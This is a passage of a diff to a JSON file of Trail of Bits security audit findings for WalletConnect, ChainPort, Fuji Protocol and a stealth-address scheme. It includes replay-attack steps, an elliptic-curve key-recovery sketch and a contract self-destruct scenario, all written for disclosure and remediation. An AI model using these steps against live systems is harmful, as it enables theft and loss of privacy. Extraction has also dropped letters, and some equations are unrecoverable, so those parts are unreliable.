missing validation of the nonce value, the payload for the signature does not appear to include the pairing topic for the pairing established between a user and the server. Because the authentication protocol runs only over an existing pairing, it would make sense to include the pairing topic value inside the signature payload. Doing so would prevent a malicious user from replaying another users previously generated signature for a new pairing that they establish with the server. To repeat our experiment that uncovered this issue, pair the React App demo application with the React Wallet demo application and intercept the trac generated from the React App demo application (e.g., use a local proxy such as BurpSuite). Initiate a transaction from the application, capture the data sent through the WebSocket channel, and conrm the transaction in the wallet. A sample captured message is shown in gure 2.1. Now, edit the message eld slightly and add == to the end of the string (= is the Base64 padding character). Finally, replay (resend) the captured data. A new conrmation dialog box should appear in the wallet. { \"id\" : 1680643717702847 , \"jsonrpc\" : \"2.0\" , \"method\" : \"irn_publish\" , \"params\" : { \"topic\" : \"42507dee006fe8(...)2d797cccf8c71fa9de4\" , \"message\" : \"AFv70BclFEn6MteTRFemaxD7Q7(...)y/eAPv3ETRHL0x86cJ6iflkIww\" , \"ttl\" : 300 , \"prompt\" : true , \"tag\" : 1108 } } Figure 2.1: A sample message sent from the dApp This nding is of undetermined severity because it is not obvious whether and how an attacker could use this vulnerability to impact users. When this nding was originally presented to the WalletConnect team, the recommended remediation was to track and enforce the correct nonce values. However, due to the distributed nature of the WalletConnect system, this could prove dicult in practice. In response, we have updated our recommendation to use timestamps instead. Timestamps are not as eective as nonces are for preventing replay attacks because it is not always possible to have a secure clock that can be relied upon. However, if nonces are infeasible to implement, timestamps are the next best option. Recommendations Short term, update the implementation of the authentication protocol to include timestamps in the signature payload that are then checked against the current time (within a reasonable window of time) upon signature validation. In addition to this, include the pairing topic in the signature payload. Long term, consider including all relevant pairing and authentication data in the signature payload, such as sender and receiver public keys. If possible, consider using nonces instead of timestamps to more eectively prevent replay attacks.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "4. Allowing invalid public keys may enable DH private key recovery ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", - "body": "Consider the following three assumptions: 1. 2. 3. Alice can add points that are not on the elliptic curve to the public key database, Bob does not verify the public key points, and Bob's scalar multiplication implementation has some specic characteristics. Assumptions 1 and 2 are currently not specied in the specication, which motivates this nding. If these assumptions hold, then Alice can recover Bob's DH key using a complicated attack, based on the CRYPTO 2000 paper by Biehl et al. and the DCC 2005 paper by Ciet et al . What follows is a rough sketch of the attack. For more details, see the reference publications, which also detail the specic characteristics for Assumption 3. Exploit Scenario Alice roughly follows the following steps: 1. Find a point ' which is not on the curve used for ECDH, and a. b. when used in Bobs scalar multiplication, is eectively on a dierent curve ' 2. 3. 4. with (a subgroup of) small prime order Brute-force all possible values of addresses with shared secret ' for ( ' || 0 ) the unique stealth address associated with ' = ( ' ) ' . ' . 0 < ' , i.e., ' = , and sends funds to all + ( '|| 0 ) * = . ' . This happens because Monitor all resulting addresses associated with until Bob withdraws funds from Repeat steps 13 for new points ' with dierent small prime orders ' to recover ' . 5. Use the Chinese Remainder Theorem to recover from ' . As a result, Alice can now track all stealth payments made to Bob (but cannot steal funds). To understand the complexity of this attack, it is sucient for Alice to repeat steps 13 for the rst 44 primes (numbers between 2 and 193). This requires Alice to make 3,831 payments in total (corresponding to the sum of the rst 44 primes). There is a tradeo where Alice uses fewer primes, which means that fewer transactions are needed. However, it means that Alice does not recover the full b dh . To compensate for this, Alice can brute-force the discrete logarithm of B dh guided by the partial information on b dh . Because the attack compromises anonymity for a particular user without giving access to funds, we consider this issue to have medium severity. As this is a complicated attack with various assumptions that requires Bob to access the funds from all his stealth addresses, we consider this issue to have high diculty. Recommendations The specication should enforce that public keys are validated for correctness, both when they are added to the public database and when they are used by senders and receivers. These validations should include point-on-curve checks, small-order-subgroup checks (if applicable), and point-at-innity checks. References Dierential Fault Attacks on Elliptic Curve Cryptosystems, Biehl et al., 2000 Elliptic Curve Cryptosystems in the Presence of Permanent and Transient Faults, Ciet et al.,", + "title": "3. Key derivation code could produce keys composed of all zeroes ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "The current implementation of the code that derives keys using the x25519 library does not enable the rejectZero option. If the counterparty is compromised, this may result in a derived key composed of all zeros, which could allow an attacker to observe or tamper with the communication. export function deriveSymKey(privateKeyA: string , publicKeyB: string ): string { const sharedKey = x25519.sharedKey( fromString(privateKeyA, BASE16), fromString(publicKeyB, BASE16), ); const hkdf = new HKDF(SHA256, sharedKey); const symKey = hkdf.expand(KEY_LENGTH); return toString(symKey, BASE16); } Figure 3.1: The code that derives keys using x25519.sharedKey ( walletconnect-monorepo/packages/utils/src/crypto.ts#3543 ) The x25519 library includes a warning about this case: /** * Returns a shared key between our secret key and a peer's public key. * * Throws an error if the given keys are of wrong length. * * If rejectZero is true throws if the calculated shared key is all-zero . * From RFC 7748: * * > Protocol designers using Diffie-Hellman over the curves defined in * > this document must not assume \"contributory behavior\". Specially, * > contributory behavior means that both parties' private keys * > contribute to the resulting shared key. Since curve25519 and * > curve448 have cofactors of 8 and 4 (respectively), an input point of * > small order will eliminate any contribution from the other party's * > private key. This situation can be detected by checking for the all- * > zero output, which implementations MAY do, as specified in Section 6. * > However, a large number of existing implementations do not do this. * * IMPORTANT: the returned key is a raw result of scalar multiplication. * To use it as a key material, hash it with a cryptographic hash function. */ Figure 3.2: Warnings in x25519.sharedKey ( stablelib/packages/x25519/x25519.ts#595615 ) This nding is of informational severity because a compromised counterparty would already allow an attacker to observe or tamper with the communication. Exploit Scenario An attacker compromises the web server on which a dApp is hosted and introduces malicious code in the front end that makes it always provide a low-order point during the key exchange. When a user connects to this dApp with their WalletConnect-enabled wallet, the derived key is all zeros. The attacker passively captures and reads the exchanged messages. Recommendations Short term, enable the rejectZero ag for uses of the deriveSymKey function. Long term, when using cryptographic primitives, research any edge cases they may have and always review relevant implementation notes. Follow recommended practices and include any defense-in-depth safety checks to ensure the protocol operates as intended.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1220,29 +1220,29 @@ ] }, { - "title": "1. Anyone can destroy the FujiVault logic contract if its initialize function was not called during deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Anyone can destroy the FujiVault logic contract if its initialize function has not already been called. Calling initialize on a logic contract is uncommon, as usually nothing is gained by doing so. The deployment script does not call initialize on any logic contract. As a result, the exploit scenario detailed below is possible after deployment. This issue is similar to a bug in AAVE that found in 2020. OpenZeppelins hardhat-upgrades plug-in protects against this issue by disallowing the use of selfdestruct or delegatecall on logic contracts. However, the Fuji Protocol team has explicitly worked around these protections by calling delegatecall in assembly, which the plug-in does not detect. Exploit Scenario The Fuji contracts are deployed, but the initialize functions of the logic contracts are not called. Bob, an attacker, deploys a contract to the address alwaysSelfdestructs, which simply always executes the selfdestruct opcode. Additionally, Bob deploys a contract to the address alwaysSucceeds, which simply never reverts. Bob calls initialize on the FujiVault logic contract, thereby becoming its owner. To make the call succeed, Bob passes 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE as the value for the _collateralAsset and _borrowAsset parameters. He then calls FujiVaultLogic.setActiveProvider(alwaysSelfdestructs), followed by FujiVault.setFujiERC1155(alwaysSucceeds) to prevent an additional revert in the next and nal call. Finally, Bob calls FujiVault.deposit(1), sending 1 wei. This triggers a delegatecall to alwaysSelfdestructs, thereby destroying the FujiVault logic contract and making the protocol unusable until its proxy contract is upgraded. 14 Fuji Protocol Because OpenZeppelins upgradeable contracts do not check for a contracts existence before a delegatecall (TOB-FUJI-003), all calls to the FujiVault proxy contract now succeed. This leads to exploits in any protocol integrating the Fuji Protocol. For example, a call that should repay all debt will now succeed even if no debt is repaid. Recommendations Short term, do not use delegatecall to implement providers. See TOB-FUJI-002 for more information. Long term, avoid the use of delegatecall, as it is dicult to use correctly and can introduce vulnerabilities that are hard to detect. 15 Fuji Protocol", + "title": "4. Insecure storage of session data in local storage ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-03-walletconnectv2-securityreview.pdf", + "body": "HTML5 local storage is used to hold session data, including keychain values. Because there are no access controls on modifying and retrieving this data using JavaScript, data in local storage is vulnerable to XSS attacks. Figure 4.1: Keychain data stored in a browsers localStorage Exploit Scenario Alice discovers an XSS vulnerability in a dApp that supports WalletConnect. This vulnerability allows Alice to retrieve the dApps keychain data, allowing her to propose new transactions to the connected wallet. Recommendations Short term, consider using cookies to store and send tokens. Enable cross-site request forgery (CSRF) libraries available to mitigate these attacks. Ensure that cookies are tagged with httpOnly , and preferably secure , to ensure that JavaScript cannot access them. References OWASP HTML5 Security Cheat Sheet: Local Storage A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "2. Providers are implemented with delegatecall ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The system uses delegatecall to execute an active provider's code on a FujiVault, making the FujiVault the holder of the positions in the borrowing protocol. However, delegatecall is generally error-prone, and the use of it introduced the high-severity nding TOB-FUJI-001. It is possible to make a FujiVault the holder of the positions in a borrowing protocol without using delegatecall. Most borrowing protocols include a parameter that species the receiver of tokens that represent a position. For borrowing protocols that do not include this type of parameter, tokens can be transferred to the FujiVault explicitly after they are received from the borrowing protocol; additionally, the tokens can be transferred from the FujiVault to the provider before they are sent to the borrowing protocol. These solutions are conceptually simpler than and preferred to the current solution. Recommendations Short term, implement providers without the use of delegatecall. Set the receiver parameters to the FujiVault, or transfer the tokens corresponding to the position to the FujiVault. Long term, avoid the use of delegatecall, as it is dicult to use correctly and can introduce vulnerabilities that are hard to detect. 16 Fuji Protocol", + "title": "1. Several secrets checked into source control ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The chainport-backend repository contains several secrets that are checked into source control. Secrets that are stored in source control are accessible to anyone who has had access to the repository (e.g., former employees or attackers who have managed to gain access to the repository). We used TrueHog to identify these secrets (by running the command trufflehog git file://. in the root directory of the repository). TrueHog found several types of credentials, including the following, which were veried through TrueHogs credential verication checks: GitHub personal access tokens Slack access tokens TrueHog also found unveried GitLab authentication tokens and Polygon API credentials. Furthermore, we found hard-coded credentials, such as database credentials, in the source code, as shown in gure 1.1. [REDACTED] Figure 1.1: chainport-backend/env.prod.json#L3-L4 Exploit Scenario An attacker obtains a copy of the source code from a former DcentraLab employee. The attacker extracts the secrets from it and uses them to exploit DcentraLabs database and insert events in the database that did not occur. Consequently, ChainPorts AWS lambdas process the fake events and allow the attacker to steal funds. Recommendations Short term, remove credentials from source control and rotate them. Run TrueHog by invoking the trufflehog git file://. command; if it identies any unveried credentials, check whether they need to be addressed. Long term, consider using a secret management solution such as Vault to store secrets. 2. Same credentials used for staging, test, and production environment databases Severity: Low Diculty: High Type: Conguration Finding ID: TOB-CHPT-2 Target: Database authentication", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "3. Lack of contract existence check on delegatecall will result in unexpected behavior ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The VaultControlUpgradeable and Proxy contracts use the delegatecall proxy pattern. If the implementation contract is incorrectly set or self-destructed, the contract may not be able to detect failed executions. The VaultControlUpgradeable contract includes the _execute function, which users can invoke indirectly to execute a transaction to a _target address. This function does not check for contract existence before executing the delegatecall (gure 3.1). /** * @dev Returns byte response of delegatcalls */ function _execute(address _target, bytes memory _data) internal whenNotPaused returns (bytes memory response) { /* solhint-disable */ assembly { let succeeded := delegatecall(sub(gas(), 5000), _target, add(_data, 0x20), mload(_data), 0, 0) let size := returndatasize() response := mload(0x40) mstore(0x40, add(response, and(add(add(size, 0x20), 0x1f), not(0x1f)))) mstore(response, size) returndatacopy(add(response, 0x20), 0, size) switch iszero(succeeded) case 1 { // throw if delegatecall failed revert(add(response, 0x20), size) } } /* solhint-disable */ } 17 Fuji Protocol Figure 3.1: fuji-protocol/contracts/abstracts/vault/VaultBaseUpgradeable.sol#L93-L11 5 The Proxy contract, deployed by the @openzeppelin/hardhat-upgrades library, includes a payable fallback function that invokes the _delegate function when proxy calls are executed. This function is also missing a contract existence check (gure 3.2). /** * @dev Delegates the current call to `implementation`. * * This function does not return to its internall call site, it will return directly to the external caller. */ function _delegate(address implementation) internal virtual { // solhint-disable-next-line no-inline-assembly assembly { // Copy msg.data. We take full control of memory in this inline assembly // block because it will not return to Solidity code. We overwrite the // Solidity scratch pad at memory position 0. calldatacopy(0, 0, calldatasize()) // Call the implementation. // out and outsize are 0 because we don't know the size yet. let result := delegatecall(gas(), implementation, 0, calldatasize(), 0, 0) // Copy the returned data. returndatacopy(0, 0, returndatasize()) switch result // delegatecall returns 0 on error. case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } } Figure 3.2: Proxy.sol#L16-L41 A delegatecall to a destructed contract will return success (gure 3.3). Due to the lack of contract existence checks, a series of batched transactions may appear to be successful even if one of the transactions fails. The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 3.3: A snippet of the Solidity documentation detailing unexpected behavior related to delegatecall Exploit Scenario Eve upgrades the proxy to point to an incorrect new implementation. As a result, each 18 Fuji Protocol delegatecall returns success without changing the state or executing code. Eve uses this to scam users. Recommendations Short term, implement a contract existence check before any delegatecall. Document the fact that suicide and selfdestruct can lead to unexpected behavior, and prevent future upgrades from using these functions. Long term, carefully review the Solidity documentation, especially the Warnings section, and the pitfalls of using the delegatecall proxy pattern. References Contract Upgrade Anti-Patterns Breaking Aave Upgradeability 19 Fuji Protocol", + "title": "3. Use of error-prone pattern for logging functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The pattern shown in gure 3.1 is used repeatedly throughout the codebase to log function names. [REDACTED] Figure 3.1: An example of the pattern used by ChainPort to log function names This pattern is prone to copy-and-paste errors. Developers may copy the code from one function to another but forget to change the function name, as exemplied in gure 3.2. [REDACTED] Figure 3.2: An example of an incorrect use of the pattern used by ChainPort to log function names We wrote a Semgrep rule to detect these problems (appendix D). This rule detected 46 errors associated with this pattern in the back-end application. Figure 3.3 shows an example of one of these ndings. [REDACTED] Figure 3.3: An example of one of the 46 errors resulting from the function-name logging pattern (chainport-backend/modules/web_3/helpers.py#L313-L315) Exploit Scenario A ChainPort developer is auditing the back-end application logs to determine the root cause of a bug. Because an incorrect function name was logged, the developer cannot correctly trace the applications ow and determine the root cause in a timely manner. Recommendations Short term, use the Python decorator in gure 3.4 to log function names. This will eliminate the risk of copy-and-paste errors. [REDACTED] Figure 3.4: A Python decorator that logs function names, eliminating the risk of copy-and-paste errors Long term, review the codebase for other error-prone patterns. If such patterns are found, rewrite the code in a way that eliminates or reduces the risk of errors, and write a Semgrep rule to nd the errors before the code hits production.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1250,9 +1250,9 @@ ] }, { - "title": "4. FujiVault.setFactor is unnecessarily complex and does not properly handle invalid input ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiVault contracts setFactor function sets one of four state variables to a given value. Which state variable is set depends on the value of a string parameter. If an invalid value is passed, setFactor succeeds but does not set any of the state variables. This creates edge cases, makes writing correct code more dicult, and increases the likelihood of bugs. function setFactor( uint64 _newFactorA, uint64 _newFactorB, string calldata _type ) external isAuthorized { bytes32 typeHash = keccak256(abi.encode(_type)); if (typeHash == keccak256(abi.encode(\"collatF\"))) { collatF.a = _newFactorA; collatF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"safetyF\"))) { safetyF.a = _newFactorA; safetyF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"bonusLiqF\"))) { bonusLiqF.a = _newFactorA; bonusLiqF.b = _newFactorB; } else if (typeHash == keccak256(abi.encode(\"protocolFee\"))) { protocolFee.a = _newFactorA; protocolFee.b = _newFactorB; } } Figure 4.1: FujiVault.sol#L475-494 Exploit Scenario A developer on the Fuji Protocol team calls setFactor from another contract. He passes a type that is not handled by setFactor. As a result, code that is expected to set a state variable does nothing, resulting in a more severe vulnerability. 20 Fuji Protocol Recommendations Short term, replace setFactor with four separate functions, each of which sets one of the four state variables. Long term, avoid string constants that simulate enumerations, as they cannot be checked by the typechecker. Instead, use enums and ensure that any code that depends on enum values handles all possible values. 21 Fuji Protocol", + "title": "4. Use of hard-coded strings instead of constants ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end code uses several hard-coded strings that could be dened as constants to prevent any typos from introducing vulnerabilities. For example, the checks that determine the systems environment compare the result of the get_env function with the strings develop, staging, prod, or local. Figure 4.1 shows an example of one of these checks. [REDACTED] Figure 4.1: chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L42-L43 We did not nd any typos in these literal strings, so we set the severity of this nding to informational. However, the use of hard-coded strings in place of constants is not best practice; we suggest xing this issue and following other best practices for writing safe code to prevent the introduction of bugs in the future. Exploit Scenario A ChainPort developer creates code that should run only in the development build and safeguards it with the check in gure 4.2. [REDACTED] Figure 4.2: An example of a check against a hard-coded string that could lead to a vulnerability This test always failsthe correct value to test should have been develop. Now, the poorly tested, experimental code that was meant to run only in development mode is deployed in production. Recommendations Short term, create a constant for each of the four possible environments. Then, to check the systems environment, import the corresponding constant and use it in the comparison instead of the hard-coded string. Alternatively, use an enum instead of a string to perform these comparisons. Long term, review the code for other instances of hard-coded strings where constants could be used instead. Create Semgrep rules to ensure that developers never use hard-coded strings where constants are available.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1260,29 +1260,29 @@ ] }, { - "title": "5. Preconditions specied in docstrings are not checked by functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The docstrings of several functions specify preconditions that the functions do not automatically check for. For example, the docstring of the FujiVault contracts setFactor function contains the preconditions shown in gure 5.1, but the functions body does not contain the corresponding checks shown in gure 5.2. * For safetyF; Sets Safety Factor of Vault, should be > 1, a/b * For collatF; Sets Collateral Factor of Vault, should be > 1, a/b Figure 5.1: FujiVault.sol#L469-470 require(safetyF.a > safetyF.b); ... require(collatF.a > collatF.b); Figure 5.2: The checks that are missing from FujiVault.setFactor Additionally, the docstring of the Controller contracts doRefinancing function contains the preconditions shown in gure 5.3, but the functions body does not contain the corresponding checks shown in gure 5.4. * @param _ratioB: _ratioA/_ratioB <= 1, and > 0 Figure 5.3: Controller.sol#L41 require(ratioA > 0 && ratioB > 0); require(ratioA <= ratioB); Figure 5.4: The checks that are missing from Controller.doRefinancing Exploit Scenario The setFactor function is called with values that violate its documented preconditions. Because the function does not check for these preconditions, unexpected behavior occurs. 22 Fuji Protocol Recommendations Short term, add checks for preconditions to all functions with preconditions specied in their docstrings. Long term, ensure that all documentation and code are in sync. 23 Fuji Protocol", + "title": "5. Use of incorrect operator in SQLAlchemy lter ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end code uses the is not operator in an SQLAlchemy querys filter. SQLAlchemy relies on the __eq__ family of methods to apply the lter; however, the is and is not operators do not trigger these methods. Therefore, only the comparison operators (== or !=) should be used. [REDACTED] Figure 5.1: chainport-backend/project/data/db/port.py#L173 We did not review whether this aw could be used to bypass the systems business logic, so we set the severity of this issue to undetermined. Exploit Scenario An attacker exploits this awed check to bypass the systems business logic and steal user funds. Recommendations Short term, replace the is not operator with != in the filter indicated above. Long term, to continuously monitor the codebase for reintroductions of this issue, run the python.sqlalchemy.correctness.bad-operator-in-filter.bad-operator-in-f ilter Semgrep rule as part of the CI/CD ow. References SQLAlchemy: Common Filter Operators Stack Overow: Select NULL Values in SQLAlchemy", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "6. The FujiERC1155.burnBatch function implementation is incorrect ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contracts burnBatch function deducts the unscaled amount from the user's balance and from the total supply of an asset. If the liquidity index of an asset (index[assetId]) is dierent from its initialized value, the execution of burnBatch could result in unintended arithmetic calculations. Instead of deducting the amount value, the function should deduct the amountScaled value. function burnBatch( address _account, uint256[] memory _ids, uint256[] memory _amounts ) external onlyPermit { require(_account != address(0), Errors.VL_ZERO_ADDR_1155); require(_ids.length == _amounts.length, Errors.VL_INPUT_ERROR); address operator = _msgSender(); uint256 accountBalance; uint256 assetTotalBalance; uint256 amountScaled; for (uint256 i = 0; i < _ids.length; i++) { uint256 amount = _amounts[i]; accountBalance = _balances[_ids[i]][_account]; assetTotalBalance = _totalSupply[_ids[i]]; amountScaled = _amounts[i].rayDiv(indexes[_ids[i]]); require(amountScaled != 0 && accountBalance >= amountScaled, Errors.VL_INVALID_BURN_AMOUNT); _balances[_ids[i]][_account] = accountBalance - amount; _totalSupply[_ids[i]] = assetTotalBalance - amount; } emit TransferBatch(operator, _account, address(0), _ids, _amounts); } Figure 6.1: FujiERC1155.sol#L218-247 24 Fuji Protocol Exploit Scenario The burnBatch function is called with an asset for which the liquidity index is dierent from its initialized value. Because amount was used instead of amountScaled, unexpected behavior occurs. Recommendations Short term, revise the burnBatch function so that it uses amountScaled instead of amount when updating a users balance and the total supply of an asset. Long term, use the burn function in the burnBatch function to keep functionality consistent. 25 Fuji Protocol", + "title": "6. Several functions receive the wrong number of arguments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Several functions in the chainport-backend repository are called with an incorrect number of arguments: Several functions in the /project/deprecated_files folder A call to release_tokens_by_maintainer from the rebalance_bridge function (gures 6.1 and 6.2) A call to generate_redeem_signature from the regenerate_signature function (gures 6.3 and 6.4) A call to get_next_nonce_for_public_address from the prepare_erc20_transfer_transaction function (gures 6.5 and 6.6) A call to get_cg_token_address_list from the main function of the le (likely old debugging code) [REDACTED] Figure 6.1: The release_tokens_by_maintainer function is called with four arguments, but at least ve are required. (chainport-backend/project/lambdas/mainchain/rebalance_monitor.py#L109-L1 14) [REDACTED] Figure 6.2: The denition of the release_tokens_by_maintainer function (chainport-backend/project/lambdas/release_tokens_by_maintainer.py#L27-L3 4) [REDACTED] Figure 6.3: A call to generate_redeem_signature that is missing the network_id argument (chainport-backend/project/scripts/keys_maintainers_signature/regenerate_ signature.py#L38-L43) [REDACTED] Figure 6.4: The denition of the generate_redeem_signature function (chainport-backend/project/lambdas/sidechain/events_handlers/handle_burn_ event.py#L46-L48) [REDACTED] Figure 6.5: A call to get_next_nonce_for_public_address that is missing the outer_session argument (chainport-backend/project/web3_cp/erc20/prepare_erc20_transfer_transacti on.py#L32-L34) [REDACTED] Figure 6.6: The denition of the get_next_nonce_for_public_address function (chainport-backend/project/web3_cp/nonce.py#L19-L21) [REDACTED] Figure 6.7: A call to get_cg_token_address_list that is missing all three arguments (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L90-91) [REDACTED] Figure 6.8: The denition of the get_cg_token_address_list function (chainport-backend/project/lambdas/token_endpoints/cg_list_get.py#L37) We did not review whether this aw could be used to bypass the systems business logic, so we set the severity of this issue to undetermined. Exploit Scenario The release_tokens_by_maintainer function is called from the rebalance_bridge function with the incorrect number of arguments. As a result, the rebalance_bridge function fails if the token balance is over the threshold limit, and the tokens are not moved to a safe address. An attacker nds another aw and is able to steal more tokens than he would have been able to if the tokens were safely stored in another account. Recommendations Short term, x the errors presented in the description of this nding by adding the missing arguments to the function calls. Long term, run pylint or a similar static analysis tool to detect these problems (and others) before the code is committed and deployed in production. This will ensure that if the list of a functions arguments ever changes (which was likely the root cause of this problem), a call that does not match the new arguments will be agged before the code is deployed.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Undetermined", + "Difficulty: Undetermined" ] }, { - "title": "7. Error in the white papers equation for the cost of renancing ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The white paper uses the following equation (equation 4) to describe how the cost of renancing is calculated: = + + + + is the amount of debt to be renanced and is a summand of the equation. This is incorrect, as it implies that the renancing cost is always greater than the amount of debt to be renanced. A correct version of the equation could be is an amount, or = + + + + = + + * , in which is a , in which percentage. Recommendations Short term, x equation 4 in the white paper. Long term, ensure that the equations in the white paper are correct and in sync with the implementation. 26 Fuji Protocol", + "title": "7. Lack of events for critical operations ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Several critical operations do not trigger events. As a result, it will be dicult to review the correct behavior of the contracts once they have been deployed. For example, the setSignatoryAddress function, which is called in the Validator contract to set the signatory address, does not emit an event providing conrmation of that operation to the contracts caller (gure 7.1). [REDACTED] Figure 7.1: The setSignatoryAddress function in Validator:43-52 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to compromise a quorum of the ChainPort congress voters contract. She then sets a new signatory address. Alice, a ChainPort team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior. Long term, consider using a blockchain-monitoring system to track any suspicious behavior in the contracts. The system relies on several contracts to behave as expected. A monitoring mechanism for critical events would quickly detect any compromised system components.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1290,99 +1290,99 @@ ] }, { - "title": "8. Errors in the white papers equation for index calculation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The white paper uses the following equation (equation 1) to describe how the index for a given token at timestamp is calculated: = 1 + ( 1 )/ 1 is the amount of the given token that the Fuji Protocol owes the provider (the borrowing protocol) at timestamp . The index is updated only when the balance changes through the accrual of interest, not when the balance changes through borrowing or repayment operations. This means that is always negative, which is incorrect, as should calculate the )/ ( 1 1 1 interest rate since the last index update. * 3 * 2 * ... * . A user's current balance is computed by taking the users initial stored The index represents the total interest rate since the deployment of the protocol. It is the product of the various interest rates accrued on the active providers during the lifetime of the protocol (measured only during state-changing interactions with the provider): 1 balance, multiplying it by the current index, and dividing it by the index at the time of the creation of that user's position. The division operation ensures that the user will not owe interest that accrued before the creation of the users position. The index provides an ecient way to keep track of interest rates without having to update each user's balance separately, which would be prohibitively expensive on Ethereum. However, interest is compounded through multiplication, not addition. The formula should use the product sign instead of the plus sign. 27 Fuji Protocol Exploit Scenario Alice decides to use the Fuji Protocol after reading the white paper. She later learns that calculations in the white paper do not match the implementations in the protocol. Because Alice allocated her funds based on her understanding of the specication, she loses funds. Recommendations Short term, replace equation 1 in the white paper with a correct and simplied version. For more information on the simplied version, see nding TOB-FUJI-015. = 1 / * 1 Long term, ensure that the equations in the white paper are correct and in sync with the implementation. 28 Fuji Protocol", + "title": "8. Lack of zero address checks in setter functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, in the initialize function of the ChainportMainBridge contract, developers can dene the maintainer registry, the congress address for governance, and the signature validator and set their addresses to the zero address. [REDACTED] Figure 8.1: The initialize function of ChainportMainBridge.sol Failure to immediately reset an address that has been set to the zero address could result in unexpected behavior. Exploit Scenario Alice accidentally sets the ChainPort congress address to the zero address when initializing a new version of the ChainportMainBridge contract. The misconguration causes the system to behave unexpectedly, and the system must be redeployed once the misconguration is detected. Recommendations Short term, add zero-value checks to all constructor functions and for all setter arguments to ensure that users cannot accidentally set incorrect values, misconguring the system. Document any arguments that are intended to be set to the zero address, highlighting the expected values of those arguments on each chain. Long term, use the Slither static analyzer to catch common issues such as this one. Consider integrating a Slither scan into the projects CI pipeline, pre-commit hooks, or build scripts.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "9. FujiERC1155.setURI does not adhere to the EIP-1155 specication ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contracts setURI function does not emit the URI event. /** * @dev Sets a new URI for all token types, by relying on the token type ID */ function setURI(string memory _newUri) public onlyOwner { _uri = _newUri; } Figure 9.1: FujiERC1155.sol#L266-268 This behavior does not adhere to the EIP-1155 specication, which states the following: Changes to the URI MUST emit the URI event if the change can be expressed with an event (i.e. it isnt dynamic/programmatic). Figure 9.2: A snippet of the EIP-1155 specication Recommendations Short term, revise the setURI function so that it emits the URI event. Long term, review the EIP-1155 specication to verify that the contracts adhere to the standard. References EIP-1155 29 Fuji Protocol", + "title": "9. Python type annotations are missing from most functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end code uses Python type annotations; however, their use is sporadic, and most functions are missing them. Exploit Scenario The cg_rest_call function receives the exception argument without specifying its type with a Python type annotation. The get_token_details_by_cg_id function calls cg_rest_call with an object of the incorrect type, an Exception instance instead of an Exception class, causing the program to crash (gure 9.1). [REDACTED] Figure 9.1: chainport-backend/modules/coingecko/api.py#L41-L42 Recommendations Short term, add type annotations to the arguments of every function. This will not prevent the code from crashing or causing undened behavior during runtime; however, it will allow developers to clearly see each arguments expected type and static analyzers to better detect type mismatches. Long term, implement checks in the CI/CD pipeline to ensure that code without type annotations is not accepted.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "10. Partial renancing operations can break the protocol ", - "html_url": 